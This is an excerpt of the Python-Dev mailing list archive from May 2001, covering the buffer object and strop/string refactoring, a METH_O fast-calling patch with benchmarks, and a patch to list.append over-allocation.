Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0CE00A.488C8D73@lemburg.com>
Message-ID: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal at lemburg.com>:

> BTW, wouldn't it suffice to add these methods to buffer objects ?
> Then you could write: buffer(ob).find('.').

Aren't buffer objects as they're currently implemented
inherently dangerous?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From martin at loewis.home.cs.tu-berlin.de  Fri May 25 08:00:47 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 25 May 2001 08:00:47 +0200
Subject: [Python-Dev] Special-casing "O"
Message-ID: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>

> Special-casing the snot out of "O" looks like a winner <wink>:

I have a patch on SF that takes this approach:

http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470

The idea is that functions can be declared as METH_O, instead of
METH_VARARGS. I also offer METH_l, but this is currently not used. The
approach could be extended to other signatures, e.g. METH_O_opt_O
(i.e. "O|O").  Some signatures cannot be changed into special-calls,
e.g. "O!", or "ll|l".

In the PyXML test suite, "O" is indeed the most frequent case (72%),
and it is primarily triggered through len (26%), append (24%), and ord
(6%). These are the only functions that make use of the new calling
conventions at the moment. If you look at the patch, you'll see that
it is quite easy to change a method to use a different calling
convention (basically just remove the PyArg_ParseTuple call).

To measure the patch, I use the script

from time import clock

indices = [1] * 20000
indices1 = indices*100
r1 = [1]*60

def doit(case):
    s = clock()
    i = 0
    if case == 0:
        f = ord
        for i in indices1:
            f("o")
    elif case == 1:
        for i in indices:
            l = []
            f = l.append
            for i in r1:
                f(i)
    elif case == 2:
        f = len
        for i in indices1:
            f("o")
    f = clock()
    return f - s

for i in xrange(10):
    print "%.3f %.3f %.3f" % (doit(0),doit(1),doit(2))

Without the patch, (almost) stock CVS gives

2.190 1.800 2.240
2.200 1.800 2.220
2.200 1.800 2.230
2.220 1.800 2.220
2.200 1.800 2.220
2.200 1.790 2.240
2.200 1.790 2.230
2.200 1.800 2.220
2.200 1.800 2.240
2.200 1.790 2.230

With the patch, I get

1.440 1.330 1.460
1.420 1.350 1.440
1.430 1.340 1.430
1.510 1.350 1.460
1.440 1.360 1.470
1.460 1.330 1.450
1.430 1.330 1.420
1.440 1.340 1.440
1.430 1.340 1.430
1.410 1.340 1.450

So the speed-up is roughly 30% to 50%, depending on how much work the
function has to do.

Please let me know what you think.

Regards,
Martin


From mal at lemburg.com  Fri May 25 10:23:10 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 10:23:10 +0200
Subject: [Python-Dev] strop vs. string
References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz>
Message-ID: <3B0E166E.581816AA@lemburg.com>

Greg Ewing wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com>:
> 
> > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > Then you could write: buffer(ob).find('.').
> 
> Aren't buffer objects as they're currently implemented
> inherently dangerous?

Why should they be ?

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Fri May 25 10:56:12 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 10:56:12 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
Message-ID: <3B0E1E2C.4BC121B5@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > Special-casing the snot out of "O" looks like a winner <wink>:
> 
> I have a patch on SF that takes this approach:
> 
> http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470
> 
> The idea is that functions can be declared as METH_O, instead of
> METH_VARARGS. I also offer METH_l, but this is currently not used. The
> approach could be extended to other signatures, e.g. METH_O_opt_O
> (i.e. "O|O").  Some signatures cannot be changed into special-calls,
> e.g. "O!", or "ll|l".
> 
> [benchmark]
> So the speed-up is roughly 30% to 50%, depending on how much work the
> function has to do.
> 
> Please let me know what you think.

Great idea, Martin.

One suggestion though: I would change is the way the
function is "declared" in the method list. Your currently use:

 {"append", (PyCFunction)listappend,  METH_O, append_doc},

Now this would be more flexible if you would implement a scheme
which lets us put the parser string into the method list. The
call mechanism could then easily figure out how to call the
method and it would also be more easily extensible:

 {"append", (PyCFunction)listappend,  METH_DIRECT, append_doc, "O"},

This would then (just like in your patch) call the listappend
function with the parser arguments inlined into the C call:

 listappend(self, arg0)

A parser marker "OO" would then call a method like this:

 method(self, arg0, arg1)

and so on.

This approach costs a little more (the string compare), but
should provide a more direct way of converting existing
functions to the new convention (just copy&paste the PyArg_ParseTuple()
argument) and also allows implementing a generic scheme which
then again relies on PyArg_ParseTuple() to do the argument
parsing, e.g. "is#" could be implemented as:

PyObject *method(PyObject self, int arg0, char *arg1, int *arg1_len)

For optional arguments we'd need some convention which then
lets the called function add the default value as needed.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From ping at lfw.org  Fri May 25 12:56:33 2001
From: ping at lfw.org (Ka-Ping Yee)
Date: Fri, 25 May 2001 05:56:33 -0500 (CDT)
Subject: [Python-Dev] May 25 is Towel Day (towelday.org)
Message-ID: <Pine.LNX.4.10.10105250556050.19548-100000@server1.lfw.org>

If you have enjoyed Douglas Adams' works, please consider carrying
or wearing a towel with you everywhere today, May 25, as a tribute
and in his memory.

For more about Towel Day, visit http://www.towelday.org/.

My apologies for being off-topic.


-- ?!ng


From gstein at lyra.org  Fri May 25 13:59:23 2001
From: gstein at lyra.org (Greg Stein)
Date: Fri, 25 May 2001 04:59:23 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0E166E.581816AA@lemburg.com>; from mal@lemburg.com on Fri, May 25, 2001 at 10:23:10AM +0200
References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> <3B0E166E.581816AA@lemburg.com>
Message-ID: <20010525045923.C12056@lyra.org>

On Fri, May 25, 2001 at 10:23:10AM +0200, M.-A. Lemburg wrote:
> Greg Ewing wrote:
> > "M.-A. Lemburg" <mal at lemburg.com>:
> > 
> > > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > > Then you could write: buffer(ob).find('.').
> > 
> > Aren't buffer objects as they're currently implemented
> > inherently dangerous?
> 
> Why should they be ?

The buffer object caches the pointer from getreadbuffer and friends. If the
target object changes that pointer (internally), then the buffer object's
value is stale.

But that is a bug fix; it is independent of the discussion at hand.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From Barrett at stsci.edu  Fri May 25 15:21:20 2001
From: Barrett at stsci.edu (Paul Barrett)
Date: Fri, 25 May 2001 09:21:20 -0400
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com>
Message-ID: <3B0E5C50.6E365F69@STScI.Edu>

"M.-A. Lemburg" wrote:
> 
> > > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > > Then you could write: buffer(ob).find('.').
> >
> > You're totally missing the point with that suggestion. It does *not*      > > suffice to add them to buffer objects. What about array objects? mmap      > > objects?  Random Joe Object who implements the buffer interface?
> 
> That's the point: you can wrap all those into a buffer object
> and then use the buffer object methods to manipulate them. In
> that sense, buffer objects provide an adaptor to the underlying
> object which implements the needed methods.

Sounds like you are trying to make the buffer object into something it
is not. Not that I have the foggiest idea what it is now, since it
hasn't much use and is badly broken.

I like your idea of sharing functions, I just don't think the buffer
object is the proper means.  I think the buffer object should be
removed from Python and something better put in its place. (I'm not
talking about the buffer C/API, though this could also use an
overhaul, since it doesn't provide enough information to the receiving
method.)

What I think we need is:

1) a malloc object which has a similar interface to the mmap object
with access protection, etc.  This object would be the fundamental way
of getting memory.  The string object would use it to allocate a chunk
of 'read-only' memory.  Other objects would then know not to modify
the contents of the memory.  If you wanted a reference or view of the
memory/buffer, you would get a reference to this object.

2) objects supporting the buffer object should provide a view method
which returns a copy of themselves (and hence all their methods) and
can be used to get a pointer to a subset of its memory.  In this way
the type of memory/buffer being accessed is known compared to the
current buffer object which only indicates the buffer is binary or
char data.  In essence information about how the buffer should be used
is lost in the current buffer C/API.

-- 
Paul Barrett, PhD      Space Telescope Science Institute
Phone: 410-338-4475    ESS/Science Software Group
FAX:   410-338-4767    Baltimore, MD 21218


From guido at digicool.com  Fri May 25 16:29:28 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 25 May 2001 10:29:28 -0400
Subject: [Python-Dev] Vacation
Message-ID: <200105251429.f4PETSd10633@odiug.digicool.com>

I will be on vacation next week without net access.  Back on June 4th!

There's a bunch of stuff that happened on the mailing list that I
expect I won't get to -- I've got to finish up some high priority
work for Digital Creations before I can leave.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Fri May 25 21:06:16 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 25 May 2001 15:06:16 -0400
Subject: [Python-Dev] Time for the yearly list.append() panic
Message-ID: <LNBBLJKPBEHFEDALKOLCIEIEKEAA.tim.one@home.com>

c.l.py has rediscovered the quadratic-time worst-case behavior of list.append().  That is, do list.append(x) in a long
loop.  Linux users don't see anything particularly bad no matter how big the loop.  WinNT eventually displays clear
quadratic-time behavior.  Win9x dies surprisingly early with a MemoryError, despite gobs of memory free:  turns out
Win9x allocates hundreds of virtual heaps, isn't able to coalesce them, and you actually run out of *address space* (the
whole 2GB user space gets fragmented beyond hope).  People on other platforms have reported other bad behaviors over the
years.

I don't want to argue about this again <wink>, I just want to know whether the patch below slows anything down on your
oddball box.  It increases the over-allocation amount in several more layers.  Also replaces integer * and / in the
over-allocation computation by bit operations (integer / in particular is very slow on *some* boxes).

Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution.

Index: Objects/listobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/listobject.c,v
retrieving revision 2.92
diff -c -r2.92 listobject.c
*** Objects/listobject.c	2001/02/12 22:06:02	2.92
--- Objects/listobject.c	2001/05/25 19:04:07
***************
*** 9,24 ****
  #include <sys/types.h>		/* For size_t */
  #endif

! #define ROUNDUP(n, PyTryBlock) \
! 	((((n)+(PyTryBlock)-1)/(PyTryBlock))*(PyTryBlock))

  static int
  roundupsize(int n)
  {
! 	if (n < 500)
  		return ROUNDUP(n, 10);
  	else
! 		return ROUNDUP(n, 100);
  }

  #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems))
--- 9,30 ----
  #include <sys/types.h>		/* For size_t */
  #endif

! #define ROUNDUP(n, nbits) \
! 	( ((n) + (1<<(nbits)) - 1) >> (nbits) << (nbits) )

  static int
  roundupsize(int n)
  {
! 	if ((n >> 9) == 0)
! 		return ROUNDUP(n, 3);
! 	else if ((n >> 13) == 0)
! 		return ROUNDUP(n, 7);
! 	else if ((n >> 17) == 0)
  		return ROUNDUP(n, 10);
+ 	else if ((n >> 20) == 0)
+ 		return ROUNDUP(n, 13);
  	else
! 		return ROUNDUP(n, 18);
  }

  #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems))


From martin at loewis.home.cs.tu-berlin.de  Fri May 25 21:51:26 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 25 May 2001 21:51:26 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B0E1E2C.4BC121B5@lemburg.com> (mal@lemburg.com)
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com>
Message-ID: <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>

> Now this would be more flexible if you would implement a scheme
> which lets us put the parser string into the method list. The
> call mechanism could then easily figure out how to call the
> method and it would also be more easily extensible:
> 
>  {"append", (PyCFunction)listappend,  METH_DIRECT, append_doc, "O"},

I'd like to hear other people's comment on this specific issue, so I
guess I should probably write a PEP outlining the options.

My immediate reaction to your proposal is that it only complicates the
interface without any savings. We still can only support a limited
number of calling conventions. E.g. it is not possible to write
portable C code that does all the calling conventions for "l", "ll",
"lll", "llll", and so on - you have to cast the function pointer to
the right prototype, which must be done in source code.

So with this interface, you may end up at run-time finding out that
you cannot support the signature. With the current patch, you'd have
to know to convert "OO" into METH_OO, which I think is not asked too
much - and it gives you a compile-time error if you use an unsupported
calling convention.

> A parser marker "OO" would then call a method like this:
> 
>  method(self, arg0, arg1)
> 
> and so on.

That is indeed the plan, but since you have to code the parameter
combinations in C code, you can only support so many of them.

> allows implementing a generic scheme which
> then again relies on PyArg_ParseTuple() to do the argument
> parsing, e.g. "is#" could be implemented as:

The point of the patch is to get rid of PyArg_ParseTuple in the
"common case". For functions with complex calling conventions, getting
rid of the PyArg_ParseTuple string parsing is not that important,
since they are expensive, anyway (not that "is#" couldn't be
supported, I'd call it METH_is_hash).

> For optional arguments we'd need some convention which then
> lets the called function add the default value as needed.

For the moment, I'd only support "|O", and perhaps "|z"; an omitted
argument would be represented as a NULL pointer. That means that "|i"
couldn't participate in the fast calling convention - unless we
translate that to

void foo(PyObject*self, int i, bool ipresent);

BTW, the most frequent function in my measurements that would make use
of this convention is "OO|i:replace", which scores at 4.5%.

Regards,
Martin


From gstein at lyra.org  Fri May 25 22:27:52 2001
From: gstein at lyra.org (Greg Stein)
Date: Fri, 25 May 2001 13:27:52 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0E5C50.6E365F69@STScI.Edu>; from Barrett@stsci.edu on Fri, May 25, 2001 at 09:21:20AM -0400
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu>
Message-ID: <20010525132752.B5402@lyra.org>

On Fri, May 25, 2001 at 09:21:20AM -0400, Paul Barrett wrote:
> "M.-A. Lemburg" wrote:
> > 
> > > > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > > > Then you could write: buffer(ob).find('.').
> > >
> > > You're totally missing the point with that suggestion. It does *not*      > > suffice to add them to buffer objects. What about array objects? mmap      > > objects?  Random Joe Object who implements the buffer interface?
> > 
> > That's the point: you can wrap all those into a buffer object
> > and then use the buffer object methods to manipulate them. In
> > that sense, buffer objects provide an adaptor to the underlying
> > object which implements the needed methods.
> 
> Sounds like you are trying to make the buffer object into something it
> is not.

The buffer object is intended to provide a Python-level object (with methods
and behavior) for any other object which exports the buffer API (but not
those particular methods/behavior).

It was added for Python 1.5.2, but did not keep up with the methods added to
the string object. Arguably, it is out of date rather than "[turning it
into] something it is not."

> Not that I have the foggiest idea what it is now, since it
> hasn't much use and is badly broken.

"badly" is overstating the problem. It caches a pointer when it shouldn't.
This doesn't work well when using it with array objects or PIL's image
objects. Most objects, it is fine.

The buffer object is also very good for C/Python extensions and embedding
code. It provides a Python-level view on a block of memory. Using a string
object implies making a copy, and it removes the possibility for read/write
access to that memory.

And you state: "Not that I have the foggiest idea what it is now". If so,
then wtf are you making statements about the buffer object's behavior?

> I like your idea of sharing functions, I just don't think the buffer
> object is the proper means.  I think the buffer object should be
> removed from Python and something better put in its place. (I'm not
> talking about the buffer C/API, though this could also use an
> overhaul, since it doesn't provide enough information to the receiving
> method.)
> 
> What I think we need is:
> 
> 1) a malloc object which has a similar interface to the mmap object
> with access protection, etc.  This object would be the fundamental way
> of getting memory.  The string object would use it to allocate a chunk
> of 'read-only' memory.  Other objects would then know not to modify
> the contents of the memory.  If you wanted a reference or view of the
> memory/buffer, you would get a reference to this object.

You're talking about the buffer object that we have *today*.

It can refer to another object (i.e. the memory exposed via the other
object's buffer API), refer to memory, or it can allocate its own memory.
The buffer object can be marked read-only, or read-write.

> 2) objects supporting the buffer object should provide a view method
> which returns a copy of themselves (and hence all their methods) and
> can be used to get a pointer to a subset of its memory.  In this way
> the type of memory/buffer being accessed is known compared to the
> current buffer object which only indicates the buffer is binary or
> char data.  In essence information about how the buffer should be used
> is lost in the current buffer C/API.

I'm not sure that I understand this paragraph.


No... what needs to happen is to have the bug in PyBufferObject fixed. Then
to refactor stringobject.c and stropmodule.c to move all of those
byte-oriented processing functions into a new file such as Python/byteops.c
(whatever; name isn't important). Ideally, stringobject.c and stropmodule.c
would be simple covers over the same functions.

Those functions can then be used by PyBufferObject to implement the rest of
the string methods on itself.


This would leave us at MAL's suggested point: via the buffer object, we can
perform all of the standard string methods/ops on any object that implements
the buffer API.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From mal at lemburg.com  Fri May 25 23:16:32 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 23:16:32 +0200
Subject: [Python-Dev] Time for the yearly list.append() panic
References: <LNBBLJKPBEHFEDALKOLCIEIEKEAA.tim.one@home.com>
Message-ID: <3B0ECBB0.6798F4AB@lemburg.com>

Tim Peters wrote:
> 
> Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution.

That's what I think too. There's really not much point in trying
to work around poor malloc() implementations when we've already
got the cure built into Python... I just wish Vladimir would 
resurface again to complete his great work (AFAIK, pymalloc still
has problems with threads).

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Fri May 25 23:38:15 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 23:38:15 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>
Message-ID: <3B0ED0C7.F1A665EA@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > Now this would be more flexible if you would implement a scheme
> > which lets us put the parser string into the method list. The
> > call mechanism could then easily figure out how to call the
> > method and it would also be more easily extensible:
> >
> >  {"append", (PyCFunction)listappend,  METH_DIRECT, append_doc, "O"},
> 
> I'd like to hear other people's comment on this specific issue, so I
> guess I should probably write a PEP outlining the options.
> 
> My immediate reaction to your proposal is that it only complicates the
> interface without any savings. We still can only support a limited
> number of calling conventions. E.g. it is not possible to write
> portable C code that does all the calling conventions for "l", "ll",
> "lll", "llll", and so on - you have to cast the function pointer to
> the right prototype, which must be done in source code.
>
> So with this interface, you may end up at run-time finding out that
> you cannot support the signature. With the current patch, you'd have
> to know to convert "OO" into METH_OO, which I think is not asked too
> much - and it gives you a compile-time error if you use an unsupported
> calling convention.

True. It's unfortunate that C doesn't offer the reverse of
varargs.h...
 
> > A parser marker "OO" would then call a method like this:
> >
> >  method(self, arg0, arg1)
> >
> > and so on.
> 
> That is indeed the plan, but since you have to code the parameter
> combinations in C code, you can only support so many of them.
> 
> > allows implementing a generic scheme which
> > then again relies on PyArg_ParseTuple() to do the argument
> > parsing, e.g. "is#" could be implemented as:
> 
> The point of the patch is to get rid of PyArg_ParseTuple in the
> "common case". For functions with complex calling conventions, getting
> rid of the PyArg_ParseTuple string parsing is not that important,
> since they are expensive, anyway (not that "is#" couldn't be
> supported, I'd call it METH_is_hash).
> 
> > For optional arguments we'd need some convention which then
> > lets the called function add the default value as needed.
> 
> For the moment, I'd only support "|O", and perhaps "|z"; an omitted
> argument would be represented as a NULL pointer. That means that "|i"
> couldn't participate in the fast calling convention - unless we
> translate that to
> 
> void foo(PyObject*self, int i, bool ipresent);
> 
> BTW, the most frequent function in my measurements that would make use
> of this convention is "OO|i:replace", which scores at 4.5%.

I was thinking of using pointer indirection for this:

	foo(PyObject *self, int *i)

If i is given as argument, *i is set to the value, otherwise
i is set to NULL.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one at home.com  Sat May 26 00:11:43 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 25 May 2001 18:11:43 -0400
Subject: [Python-Dev] Time for the yearly list.append() panic
In-Reply-To: <3B0ECBB0.6798F4AB@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEIMKEAA.tim.one@home.com>

[Tim]
> Long-term we should teach PyMalloc about Python's realloc()
> abuses and craft a cooperative solution.

[MAL]
> That's what I think too. There's really not much point in trying
> to work around poor malloc() implementations when we've already
> got the cure built into Python...

The point *here* is that a simple localized patch could kill off a
Frequently Irritating Complaint without further ado:  on my personal
cost/benefit scale, it's all I can *afford* to do now.  PyMalloc likely
won't solve it as-is x-platform, without new work to accommodate extreme
realloc() abuse.

> I just wish Vladimir would resurface again to complete his great
> work

I'd like him to come back even if he doesn't <wink>.

> (AFAIK, pymalloc still has problems with threads).

It has lock macros that haven't been #define'd to do anything yet.  But part
of the potential value of the Python core using its own allocator is to
exploit the global interpreter lock to *not* lock in the allocator.  Messy
issues.  Python should grow a cheaper platform-specific flavor of internal
lock too.  (Jeremy pointed out some code the other day that jumps through
hoops to simulate a reentrant lock on top of a Python lock; an irony is that
on Windows, the native lock *is* reentrant already, and Python jumps through
hoops to make it act as if it weren't <wink>)


From mal at lemburg.com  Sat May 26 00:07:00 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sat, 26 May 2001 00:07:00 +0200
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu> <20010525132752.B5402@lyra.org>
Message-ID: <3B0ED784.FC53D01@lemburg.com>

Greg Stein wrote:
> 
> No... what needs to happen is to have the bug in PyBufferObject fixed. Then
> to refactor stringobject.c and stropmodule.c to move all of those
> byte-oriented processing functions into a new file such as Python/byteops.c
> (whatever; name isn't important). Ideally, stringobject.c and stropmodule.c
> would be simple covers over the same functions.
> 
> Those functions can then be used by PyBufferObject to implement the rest of
> the string methods on itself.
> 
> This would leave us at MAL's suggested point: via the buffer object, we can
> perform all of the standard string methods/ops on any object that implements
> the buffer API.

I wonder how we could achieve this without copy&pasting all
the needed methods from stringobject.c to bufferobject.c....
all the string methods use the string object layout directly
rather than just dealing with a pointer and a length.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From m.favas at per.dem.csiro.au  Sat May 26 04:34:20 2001
From: m.favas at per.dem.csiro.au (Mark Favas)
Date: Sat, 26 May 2001 10:34:20 +0800
Subject: [Python-Dev] Time for the yearly list.append() panic
Message-ID: <3B0F162C.AD16E452@per.dem.csiro.au>

[Tim wants to know whether his patch to listobject.c slows anything down
on anyone's "oddball box"...]

While in no way admitting that mine is an oddball box <wink>, it being a
Tru64 Unix alpha processor machine, I do see a slowdown after applying
the patch (measured on the test suite and on pystone). However, it's
only of the order of 0.5 to 1%.

slightly-oddly y'rs  - Mark

-- 
Mark Favas  -   m.favas at per.dem.csiro.au
CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA


From tim.one at home.com  Sat May 26 06:05:40 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 26 May 2001 00:05:40 -0400
Subject: [Python-Dev] Time for the yearly list.append() panic
In-Reply-To: <3B0F162C.AD16E452@per.dem.csiro.au>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEJAKEAA.tim.one@home.com>

[Mark Favas]
> [Tim wants to know whether his patch to listobject.c slows anything down
> on anyone's "oddball box"...]
>
> While in no way admitting that mine is an oddball box <wink>,

Heh -- of course not.  I had more in mind obscure OSes like Linux <wink>.

> it being a Tru64 Unix alpha processor machine, I do see a slowdown
> after applying the patch (measured on the test suite and on pystone).
> However, it's only of the order of 0.5 to 1%.

Now that's very odd, since Alpha has about the slowest integer divsion on
Earth, and every list append was doing an int div before the patch but not
after.

I'm afraid that timing the test suite before and after is a red herring, as
several of the expensive tests have (pseudo)random components and can do an
amount of work that varies depending on system time at the time random.py is
first imported.

pystone is even odder:  the relevant code in listobject.c is never executed
during pystone!  I suspected that because pystone is an old synthetic Ada
benchmark simulating a pile of integer systems programs, so pystone is
unique among Python programs in not exercising any of Python's useful
features <wink> -- a breakpoint in the debugger just now confirmed it (never
did a list resize after compilation finished).

So I'm pretty sure that after I check it in, you'll see a speedup instead
<wink>.

Get anywhere identifying why your other app is 20% slower (blast from the
past)?


From martin at loewis.home.cs.tu-berlin.de  Sat May 26 07:28:32 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sat, 26 May 2001 07:28:32 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B0ED0C7.F1A665EA@lemburg.com> (mal@lemburg.com)
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com>
Message-ID: <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>

> I was thinking of using pointer indirection for this:
> 
> 	foo(PyObject *self, int *i)
> 
> If i is given as argument, *i is set to the value, otherwise
> i is set to NULL.

That is a good idea; I'll try to update my patch to more calling
conventions.

Regards,
Martin


From tim.one at home.com  Sat May 26 08:44:04 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 26 May 2001 02:44:04 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0ED784.FC53D01@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEJEKEAA.tim.one@home.com>

The buffer object has been neglected for years:  is that because it's in
prime shape, or because nobody cares about it enough to maintain it?  "The
bug" has been known for years without any action taken to address it; the
docs give up in spots and nobody addresses that either (like "The current
policy seems to state that these characters may be multi-byte characters" --
well, yes or no?); the builtin buffer() function isn't called anywhere in
the std test suite; the file object still has an undocumented readinto()
method that just confuses people who bump into it; and it's so obscure in
daily life that it appears Guido didn't even think of it when adding
iterators for the other sequence types.

I expect that answers my question <wink>.  Is someone (Greg? MAL?) going to
champion it now?  That would be cool.

About combining strop and buffers and strings, don't forget unicodeobject.c:
that's got oodles of basically duplicate code too.  /F suggested dealing
with the minor differences via maintaining one code file that gets compiled
multiple times w/ appropriate #defines.


From tim.one at home.com  Sat May 26 10:14:06 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 26 May 2001 04:14:06 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEJHKEAA.tim.one@home.com>

I don't want to see us duplicate the guts of PyArg_ParseTuple() inside
do_call_special().  METH_O is a cool idea, METH_l is marginal, and the new
code is already slower for METH_O than it needs to be in order to support
the *possibility* of METH_l too (stacks and loops and switch stmts and an
extra layer of do_call_special function call "just in case").

Do METH_O, convert every "O" function to use it, declare victory, and enjoy
the weekend <wink>.

1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
    size-ly y'rs  - tim


From m.favas at per.dem.csiro.au  Sat May 26 10:30:29 2001
From: m.favas at per.dem.csiro.au (Mark Favas)
Date: Sat, 26 May 2001 16:30:29 +0800
Subject: [Python-Dev] Time for the yearly list.append() panic
References: <LNBBLJKPBEHFEDALKOLCKEJAKEAA.tim.one@home.com>
Message-ID: <3B0F69A5.6F569573@per.dem.csiro.au>

[Tim tells Mark that his observations reflect more Brownian motion
(pseudo!) than reality...]

> [Mark Favas]
> > it being a Tru64 Unix alpha processor machine, I do see a slowdown
> > after applying the patch (measured on the test suite and on pystone).
> > However, it's only of the order of 0.5 to 1%.
> 
> Now that's very odd, since Alpha has about the slowest integer divsion on
> Earth, and every list append was doing an int div before the patch but not
> after.
> 
> I'm afraid that timing the test suite before and after is a red herring, as
> several of the expensive tests have (pseudo)random components and can do an
> amount of work that varies depending on system time at the time random.py is
> first imported.
> 
> pystone is even odder:  the relevant code in listobject.c is never executed
> during pystone!  I suspected that because pystone is an old synthetic Ada
> benchmark simulating a pile of integer systems programs, so pystone is
> unique among Python programs in not exercising any of Python's useful
> features <wink> -- a breakpoint in the debugger just now confirmed it (never
> did a list resize after compilation finished).
> 
> So I'm pretty sure that after I check it in, you'll see a speedup instead
> <wink>.

OK <grin>: this time, instead of making unwarranted assumptions about
test suites and pystones <wink>, I wrote and ran a test that I _think_
should exercise the code (at least, it does lots of list.append()s),
and, yes, the newly checked-in code's about 3-4% faster compared with
the original version of, well, days ago.

> 
> Get anywhere identifying why your other app is 20% slower (blast from the
> past)?

No, not yet. The profiling results at first eyeball seemed hard to match
up, so I put it off for a rainy weekend. And Perth's drought has just
broken... Will attempt to make sense of it. Interesting that Marc Andre
seemed to get a somewhat similar slowdown between 1.52 and 2.0.

-- 
Mark Favas  -   m.favas at per.dem.csiro.au
CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA


From mal at lemburg.com  Sat May 26 11:54:12 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sat, 26 May 2001 11:54:12 +0200
Subject: [Python-Dev] Special-casing "O"
